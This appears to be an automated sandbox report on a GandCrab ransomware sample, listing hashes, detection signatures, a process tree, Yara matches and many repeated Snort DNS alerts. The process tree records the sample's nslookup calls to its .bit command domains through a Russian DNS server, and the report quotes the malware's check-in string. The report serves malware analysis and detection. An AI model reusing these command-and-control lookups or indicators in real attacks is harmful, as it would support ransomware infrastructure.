Edit tour

Windows Analysis Report
9gkAKTWOXp.exe

Overview

General Information

Sample Name:	9gkAKTWOXp.exe
Analysis ID:	694569
MD5:	74e135b472b7496b371ce3ba3acfeea8
SHA1:	b64fdd870ff28291b8347317a838a5fb210a6056
SHA256:	d093322a612760cb00ae6fb4c453851ba26f59f2e6a0920b5871a28bbddf9355
Tags:	exe
Infos:

Detection

Gandcrab

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected Gandcrab

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Snort IDS alert for network traffic

Contains functionality to determine the online IP of the system

Found Tor onion address

Uses nslookup.exe to query domains

Machine Learning detection for sample

May check the online IP address of the machine

Machine Learning detection for dropped file

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Sample execution stops while process was sleeping (likely an evasion)

Too many similar processes found

Contains functionality to dynamically determine API calls

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Queries information about the installed CPU (vendor, model number etc)

Drops PE files

Found evaded block containing many API calls

Contains functionality to enumerate device drivers

Checks for available system drives (often done to infect USB drives)

Uses Microsoft's Enhanced Cryptographic Provider

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

9gkAKTWOXp.exe (PID: 4664 cmdline: "C:\Users\user\Desktop\9gkAKTWOXp.exe" MD5: 74E135B472B7496B371CE3BA3ACFEEA8)

nslookup.exe (PID: 5752 cmdline: nslookup nomoreransom.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)

conhost.exe (PID: 5460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nslookup.exe (PID: 484 cmdline: nslookup emsisoft.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)

conhost.exe (PID: 1944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nslookup.exe (PID: 5368 cmdline: nslookup gandcrab.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)

conhost.exe (PID: 4184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nslookup.exe (PID: 6080 cmdline: nslookup nomoreransom.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)

conhost.exe (PID: 5208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nslookup.exe (PID: 3232 cmdline: nslookup emsisoft.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)

conhost.exe (PID: 5816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nslookup.exe (PID: 3460 cmdline: nslookup gandcrab.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)

conhost.exe (PID: 3880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nslookup.exe (PID: 408 cmdline: nslookup nomoreransom.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)

conhost.exe (PID: 5920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nslookup.exe (PID: 996 cmdline: nslookup emsisoft.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)

conhost.exe (PID: 5116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nslookup.exe (PID: 5780 cmdline: nslookup gandcrab.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)

conhost.exe (PID: 5360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nslookup.exe (PID: 5880 cmdline: nslookup nomoreransom.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)

conhost.exe (PID: 4272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nslookup.exe (PID: 4948 cmdline: nslookup emsisoft.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)

conhost.exe (PID: 1328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nslookup.exe (PID: 6064 cmdline: nslookup gandcrab.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)

conhost.exe (PID: 1976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nslookup.exe (PID: 5784 cmdline: nslookup nomoreransom.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)

conhost.exe (PID: 5956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nslookup.exe (PID: 2516 cmdline: nslookup emsisoft.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)

conhost.exe (PID: 3184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nslookup.exe (PID: 576 cmdline: nslookup gandcrab.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)

conhost.exe (PID: 5500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nslookup.exe (PID: 5964 cmdline: nslookup nomoreransom.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)

conhost.exe (PID: 5972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nslookup.exe (PID: 4512 cmdline: nslookup emsisoft.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)

conhost.exe (PID: 1360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nslookup.exe (PID: 1556 cmdline: nslookup gandcrab.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)

conhost.exe (PID: 2140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nslookup.exe (PID: 2764 cmdline: nslookup nomoreransom.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)

conhost.exe (PID: 4820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nslookup.exe (PID: 4272 cmdline: nslookup emsisoft.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)

conhost.exe (PID: 3184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nslookup.exe (PID: 5236 cmdline: nslookup gandcrab.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)

conhost.exe (PID: 4996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nslookup.exe (PID: 5708 cmdline: nslookup nomoreransom.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)

conhost.exe (PID: 3196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

vkspii.exe (PID: 6028 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe" MD5: 551DA842D854798E9D42602EB420BD96)

vkspii.exe (PID: 4024 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe" MD5: 551DA842D854798E9D42602EB420BD96)

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
9gkAKTWOXp.exe	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xf716:$: DECRYPT.txt 0xf784:$: DECRYPT.txt
9gkAKTWOXp.exe	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
9gkAKTWOXp.exe	Gandcrab	Gandcrab Payload	kevoreilly	0xf70c:$string1: GDCB-DECRYPT.txt 0xf77a:$string1: GDCB-DECRYPT.txt 0xf460:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xf716:$: DECRYPT.txt 0xf784:$: DECRYPT.txt
C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe	Gandcrab	Gandcrab Payload	kevoreilly	0xf70c:$string1: GDCB-DECRYPT.txt 0xf77a:$string1: GDCB-DECRYPT.txt 0xf460:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&

Memory Dumps

Source	Rule	Description	Author
0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmp	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
0000000D.00000000.288179215.000000000040E000.00000008.00000001.01000000.00000006.sdmp	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmp	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
00000001.00000000.253403415.000000000040E000.00000008.00000001.01000000.00000003.sdmp	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
00000015.00000000.302558828.000000000040E000.00000008.00000001.01000000.00000006.sdmp	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmp	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmp	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmp	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
Process Memory Space: 9gkAKTWOXp.exe PID: 4664	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
Process Memory Space: vkspii.exe PID: 6028	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
Process Memory Space: vkspii.exe PID: 4024	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
Click to see the 6 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
13.0.vkspii.exe.400000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xf716:$: DECRYPT.txt 0xf784:$: DECRYPT.txt
13.0.vkspii.exe.400000.0.unpack	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
13.0.vkspii.exe.400000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xf70c:$string1: GDCB-DECRYPT.txt 0xf77a:$string1: GDCB-DECRYPT.txt 0xf460:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
1.2.9gkAKTWOXp.exe.400000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xf716:$: DECRYPT.txt 0xf784:$: DECRYPT.txt
1.2.9gkAKTWOXp.exe.400000.0.unpack	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
1.2.9gkAKTWOXp.exe.400000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xf70c:$string1: GDCB-DECRYPT.txt 0xf77a:$string1: GDCB-DECRYPT.txt 0xf460:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
13.2.vkspii.exe.400000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xf716:$: DECRYPT.txt 0xf784:$: DECRYPT.txt
13.2.vkspii.exe.400000.0.unpack	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
13.2.vkspii.exe.400000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xf70c:$string1: GDCB-DECRYPT.txt 0xf77a:$string1: GDCB-DECRYPT.txt 0xf460:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
21.2.vkspii.exe.400000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xf716:$: DECRYPT.txt 0xf784:$: DECRYPT.txt
21.2.vkspii.exe.400000.0.unpack	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
1.0.9gkAKTWOXp.exe.400000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xf716:$: DECRYPT.txt 0xf784:$: DECRYPT.txt
21.2.vkspii.exe.400000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xf70c:$string1: GDCB-DECRYPT.txt 0xf77a:$string1: GDCB-DECRYPT.txt 0xf460:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
1.0.9gkAKTWOXp.exe.400000.0.unpack	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
1.0.9gkAKTWOXp.exe.400000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xf70c:$string1: GDCB-DECRYPT.txt 0xf77a:$string1: GDCB-DECRYPT.txt 0xf460:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
21.0.vkspii.exe.400000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xf716:$: DECRYPT.txt 0xf784:$: DECRYPT.txt
21.0.vkspii.exe.400000.0.unpack	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
21.0.vkspii.exe.400000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xf70c:$string1: GDCB-DECRYPT.txt 0xf77a:$string1: GDCB-DECRYPT.txt 0xf460:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
Click to see the 13 entries

Snort Signatures

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.855642532829498 09/01/22-00:01:41.321667
SID:	2829498
Source Port:	55642
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.860090532829500 09/01/22-00:02:16.489371
SID:	2829500
Source Port:	60090
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.862436532026737 09/01/22-00:02:57.542714
SID:	2026737
Source Port:	62436
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.855955532829500 09/01/22-00:03:25.632008
SID:	2829500
Source Port:	55955
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.853431532829498 09/01/22-00:02:18.409896
SID:	2829498
Source Port:	53431
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.865513532829500 09/01/22-00:02:19.430995
SID:	2829500
Source Port:	65513
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.864276532829498 09/01/22-00:03:00.100399
SID:	2829498
Source Port:	64276
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.851891532026737 09/01/22-00:03:31.975246
SID:	2026737
Source Port:	51891
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.859765532026737 09/01/22-00:03:34.032990
SID:	2026737
Source Port:	59765
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.853309532829500 09/01/22-00:01:54.918396
SID:	2829500
Source Port:	53309
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.854155532829498 09/01/22-00:02:39.711366
SID:	2829498
Source Port:	54155
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.849169532829500 09/01/22-00:02:32.443414
SID:	2829500
Source Port:	49169
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.864378532829500 09/01/22-00:03:19.972139
SID:	2829500
Source Port:	64378
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.857391532829500 09/01/22-00:02:53.276938
SID:	2829500
Source Port:	57391
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.851597532026737 09/01/22-00:03:26.976848
SID:	2026737
Source Port:	51597
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.853271532829498 09/01/22-00:02:55.260307
SID:	2829498
Source Port:	53271
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.853471532829500 09/01/22-00:02:00.665796
SID:	2829500
Source Port:	53471
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.865323532026737 09/01/22-00:01:43.859132
SID:	2026737
Source Port:	65323
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.860647532829498 09/01/22-00:03:25.300157
SID:	2829498
Source Port:	60647
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.850230532026737 09/01/22-00:02:54.735839
SID:	2026737
Source Port:	50230
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.850624532026737 09/01/22-00:03:18.677171
SID:	2026737
Source Port:	50624
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.853468532829500 09/01/22-00:02:00.604247
SID:	2829500
Source Port:	53468
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.858122532829498 09/01/22-00:02:27.905128
SID:	2829498
Source Port:	58122
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.854436532829498 09/01/22-00:03:36.045306
SID:	2829498
Source Port:	54436
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.862426532026737 09/01/22-00:03:13.145963
SID:	2026737
Source Port:	62426
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.856046532829500 09/01/22-00:01:38.500367
SID:	2829500
Source Port:	56046
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.859378532829500 09/01/22-00:02:48.340518
SID:	2829500
Source Port:	59378
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.858305532026737 09/01/22-00:02:34.497221
SID:	2026737
Source Port:	58305
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.861418532829498 09/01/22-00:02:02.984507
SID:	2829498
Source Port:	61418
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.850095532026737 09/01/22-00:03:38.741458
SID:	2026737
Source Port:	50095
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.852114532026737 09/01/22-00:03:20.324395
SID:	2026737
Source Port:	52114
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.865466532829500 09/01/22-00:03:37.373699
SID:	2829500
Source Port:	65466
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.853042532026737 09/01/22-00:03:06.339869
SID:	2026737
Source Port:	53042
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.849877532829500 09/01/22-00:02:36.035379
SID:	2829500
Source Port:	49877
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.864971532829500 09/01/22-00:03:05.617213
SID:	2829500
Source Port:	64971
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.861186532829498 09/01/22-00:02:52.648140
SID:	2829498
Source Port:	61186
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.859829532829500 09/01/22-00:02:55.953112
SID:	2829500
Source Port:	59829
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.849204532026737 09/01/22-00:02:46.678054
SID:	2026737
Source Port:	49204
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.861364532829498 09/01/22-00:03:28.558638
SID:	2829498
Source Port:	61364
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.857829532829500 09/01/22-00:03:23.021549
SID:	2829500
Source Port:	57829
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.850788532026737 09/01/22-00:02:43.387386
SID:	2026737
Source Port:	50788
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.851996532026737 09/01/22-00:02:26.312895
SID:	2026737
Source Port:	51996
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.857706532829500 09/01/22-00:01:42.686131
SID:	2829500
Source Port:	57706
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.859436532026737 09/01/22-00:01:57.638087
SID:	2026737
Source Port:	59436
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.859822532026737 09/01/22-00:02:19.952319
SID:	2026737
Source Port:	59822
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.860587532026737 09/01/22-00:01:27.550732
SID:	2026737
Source Port:	60587
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.852957532829500 09/01/22-00:01:25.328522
SID:	2829500
Source Port:	52957
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.858914532829500 09/01/22-00:03:18.020601
SID:	2829500
Source Port:	58914
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.3 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.38.8.8.853850532026737 09/01/22-00:01:50.247028
SID:	2026737
Source Port:	53850
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

